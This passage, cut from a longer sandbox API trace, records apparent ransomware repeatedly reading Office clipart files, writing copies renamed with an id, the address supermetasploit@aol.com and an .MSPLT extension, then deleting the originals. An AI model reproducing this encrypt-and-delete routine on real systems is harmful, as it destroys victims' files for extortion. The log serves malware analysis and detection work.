Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 68 [0319.628] lstrlenW (lpString=".doc") returned 4 [0319.628] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.628] lstrlenW (lpString=".docx") returned 5 [0319.628] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0319.628] lstrlenW (lpString=".pdf") returned 4 [0319.628] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.628] lstrlenW (lpString=".xls") returned 4 [0319.628] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.945] lstrlenW (lpString=".xlsx") returned 5 [0319.945] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0319.945] lstrlenW (lpString=".ppt") returned 4 [0319.945] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 68 [0319.945] lstrlenW (lpString=".zip") returned 4 [0319.945] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.945] lstrlenW (lpString=".rar") returned 4 [0319.945] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.945] lstrlenW (lpString=".bz2") returned 4 [0319.946] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.946] lstrlenW (lpString=".7z") returned 3 [0319.946] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 68 [0319.946] lstrlenW (lpString=".dbf") returned 4 [0319.946] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 68 [0319.946] lstrlenW (lpString=".1cd") returned 4 [0319.946] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 68 [0319.946] lstrlenW (lpString=".jpg") returned 4 [0319.946] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.946] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0319.946] lstrlenW (lpString="DD01015_.WMF") returned 12 [0319.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01015_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x554 [0319.948] GetFileSizeEx (in: hFile=0x554, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=2226) returned 1 [0319.948] CloseHandle (hObject=0x554) returned 1 [0319.948] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01015_.wmf")) returned 0x220 [0319.948] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01015_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.948] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01015_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x554 [0319.949] SetFilePointerEx (in: hFile=0x554, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.949] SetFilePointerEx (in: hFile=0x554, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.949] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01015_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x548 [0319.950] GetLastError () returned 0x0 [0319.950] ReadFile (in: hFile=0x554, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x8b2, lpOverlapped=0x0) returned 1 [0320.132] WriteFile (in: hFile=0x548, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0x8c0, lpOverlapped=0x0) returned 1 [0320.133] ReadFile (in: hFile=0x554, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0320.134] WriteFile (in: hFile=0x548, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0320.134] SetEndOfFile (hFile=0x548) returned 1 [0320.144] CloseHandle (hObject=0x548) returned 1 [0320.144] SetFilePointerEx (in: hFile=0x554, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.144] SetEndOfFile (hFile=0x554) returned 1 [0320.154] CloseHandle (hObject=0x554) returned 1 [0320.154] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0320.159] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01015_.wmf")) returned 1 [0320.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 68 [0320.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 68 [0320.160] lstrlenW (lpString=".doc") returned 4 [0320.160] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0320.160] lstrlenW (lpString=".docx") returned 5 [0320.160] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0320.160] lstrlenW (lpString=".pdf") returned 4 [0320.160] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0320.160] lstrlenW (lpString=".xls") returned 4 [0320.160] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0320.160] lstrlenW (lpString=".xlsx") returned 5 [0320.160] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0320.160] lstrlenW (lpString=".ppt") returned 4 [0320.161] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0320.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 68 [0320.161] lstrlenW (lpString=".zip") returned 4 [0320.161] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0320.161] lstrlenW (lpString=".rar") returned 4 [0320.161] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0320.161] lstrlenW (lpString=".bz2") returned 4 [0320.161] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0320.161] lstrlenW (lpString=".7z") returned 3 [0320.161] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0320.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 68 [0320.161] lstrlenW (lpString=".dbf") returned 4 [0320.161] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0320.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 68 [0320.161] lstrlenW (lpString=".1cd") returned 4 [0320.161] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0320.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 68 [0320.161] lstrlenW (lpString=".jpg") returned 4 [0320.161] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0320.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 68 [0320.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 68 [0320.161] lstrlenW (lpString=".doc") returned 4 [0320.161] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0320.161] lstrlenW (lpString=".docx") returned 5 [0320.162] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0320.162] lstrlenW (lpString=".pdf") returned 4 [0320.162] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0320.162] lstrlenW (lpString=".xls") returned 4 [0320.162] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0320.162] lstrlenW (lpString=".xlsx") returned 5 [0320.162] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0320.162] lstrlenW (lpString=".ppt") returned 4 [0320.162] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0320.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 68 [0320.162] lstrlenW (lpString=".zip") returned 4 [0320.162] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0320.162] lstrlenW (lpString=".rar") returned 4 [0320.162] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0320.162] lstrlenW (lpString=".bz2") returned 4 [0320.162] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0320.162] lstrlenW (lpString=".7z") returned 3 [0320.162] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0320.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 68 [0320.162] lstrlenW (lpString=".dbf") returned 4 [0320.162] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0320.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 68 [0320.162] lstrlenW (lpString=".1cd") returned 4 [0320.162] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0320.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 68 [0320.162] lstrlenW (lpString=".jpg") returned 4 [0320.162] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0320.163] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0320.163] lstrlenW (lpString="DD01138_.WMF") returned 12 [0320.163] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01138_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x554 [0320.164] GetFileSizeEx (in: hFile=0x554, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=3692) returned 1 [0320.164] CloseHandle (hObject=0x554) returned 1 [0320.164] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01138_.wmf")) returned 0x220 [0320.164] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01138_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0320.164] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01138_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x554 [0320.165] SetFilePointerEx (in: hFile=0x554, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.165] SetFilePointerEx (in: hFile=0x554, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.165] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01138_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0320.166] GetLastError () returned 0x0 [0320.166] ReadFile (in: hFile=0x554, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0xe6c, lpOverlapped=0x0) returned 1 [0320.168] WriteFile (in: hFile=0x3b0, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xe70, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xe70, lpOverlapped=0x0) returned 1 [0320.169] ReadFile (in: hFile=0x554, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0320.169] WriteFile (in: hFile=0x3b0, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0320.169] SetEndOfFile (hFile=0x3b0) returned 1 [0320.170] CloseHandle (hObject=0x3b0) returned 1 [0320.170] SetFilePointerEx (in: hFile=0x554, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.170] SetEndOfFile (hFile=0x554) returned 1 [0320.173] CloseHandle (hObject=0x554) returned 1 [0320.174] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0320.174] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01138_.wmf")) returned 1 [0320.175] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 68 [0320.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 68 [0320.176] lstrlenW (lpString=".doc") returned 4 [0320.176] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0320.176] lstrlenW (lpString=".docx") returned 5 [0320.176] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0320.176] lstrlenW (lpString=".pdf") returned 4 [0320.176] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0320.176] lstrlenW (lpString=".xls") returned 4 [0320.176] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0320.176] lstrlenW (lpString=".xlsx") returned 5 [0320.176] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0320.176] lstrlenW (lpString=".ppt") returned 4 [0320.176] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0320.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 68 [0320.176] lstrlenW (lpString=".zip") returned 4 [0320.176] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0320.176] lstrlenW (lpString=".rar") returned 4 [0320.176] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0320.176] lstrlenW (lpString=".bz2") returned 4 [0320.176] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0320.176] lstrlenW (lpString=".7z") returned 3 [0320.176] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0320.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 68 [0320.176] lstrlenW (lpString=".dbf") returned 4 [0320.176] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0320.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 68 [0320.177] lstrlenW (lpString=".1cd") returned 4 [0320.177] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0320.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 68 [0320.177] lstrlenW (lpString=".jpg") returned 4 [0320.177] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0320.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 68 [0320.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 68 [0320.177] lstrlenW (lpString=".doc") returned 4 [0320.177] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0320.177] lstrlenW (lpString=".docx") returned 5 [0320.177] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0320.177] lstrlenW (lpString=".pdf") returned 4 [0320.177] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0320.177] lstrlenW (lpString=".xls") returned 4 [0320.177] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0320.177] lstrlenW (lpString=".xlsx") returned 5 [0320.177] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0320.177] lstrlenW (lpString=".ppt") returned 4 [0320.177] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0320.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 68 [0320.177] lstrlenW (lpString=".zip") returned 4 [0320.177] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0320.177] lstrlenW (lpString=".rar") returned 4 [0320.178] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0320.178] lstrlenW (lpString=".bz2") returned 4 [0320.178] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0320.178] lstrlenW (lpString=".7z") returned 3 [0320.178] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0320.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 68 [0320.178] lstrlenW (lpString=".dbf") returned 4 [0320.178] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0320.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 68 [0320.178] lstrlenW (lpString=".1cd") returned 4 [0320.178] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0320.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 68 [0320.178] lstrlenW (lpString=".jpg") returned 4 [0320.178] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0320.178] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0320.178] lstrlenW (lpString="DD01139_.WMF") returned 12 [0320.178] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01139_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x554 [0320.180] GetFileSizeEx (in: hFile=0x554, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=3632) returned 1 [0320.180] CloseHandle (hObject=0x554) returned 1 [0320.180] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01139_.wmf")) returned 0x220 [0320.180] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01139_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0320.180] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01139_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x554 [0320.181] SetFilePointerEx (in: hFile=0x554, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.181] SetFilePointerEx (in: hFile=0x554, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01139_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0320.182] GetLastError () returned 0x0 [0320.182] ReadFile (in: hFile=0x554, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0xe30, lpOverlapped=0x0) returned 1 [0320.334] WriteFile (in: hFile=0x3b0, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xe40, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xe40, lpOverlapped=0x0) returned 1 [0320.336] ReadFile (in: hFile=0x554, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0320.336] WriteFile (in: hFile=0x3b0, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0320.336] SetEndOfFile (hFile=0x3b0) returned 1 [0320.337] CloseHandle (hObject=0x3b0) returned 1 [0320.337] SetFilePointerEx (in: hFile=0x554, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.337] SetEndOfFile (hFile=0x554) returned 1 [0320.342] CloseHandle (hObject=0x554) returned 1 [0320.343] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0321.764] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01139_.wmf")) returned 1 [0321.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 68 [0321.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 68 [0321.766] lstrlenW (lpString=".doc") returned 4 [0321.766] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0321.766] lstrlenW (lpString=".docx") returned 5 [0321.766] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0321.766] lstrlenW (lpString=".pdf") returned 4 [0321.766] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0321.766] lstrlenW (lpString=".xls") returned 4 [0321.766] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0321.766] lstrlenW (lpString=".xlsx") returned 5 [0321.766] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0321.766] lstrlenW (lpString=".ppt") returned 4 [0321.766] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0321.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 68 [0321.766] lstrlenW (lpString=".zip") returned 4 [0321.766] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0321.766] lstrlenW (lpString=".rar") returned 4 [0321.766] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0321.766] lstrlenW (lpString=".bz2") returned 4 [0321.766] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0321.767] lstrlenW (lpString=".7z") returned 3 [0321.767] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0321.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 68 [0321.767] lstrlenW (lpString=".dbf") returned 4 [0321.767] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0321.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 68 [0321.767] lstrlenW (lpString=".1cd") returned 4 [0321.767] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0321.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 68 [0321.767] lstrlenW (lpString=".jpg") returned 4 [0321.767] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0321.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 68 [0321.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 68 [0321.767] lstrlenW (lpString=".doc") returned 4 [0321.767] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0321.767] lstrlenW (lpString=".docx") returned 5 [0321.767] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0321.767] lstrlenW (lpString=".pdf") returned 4 [0321.767] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0321.768] lstrlenW (lpString=".xls") returned 4 [0321.768] 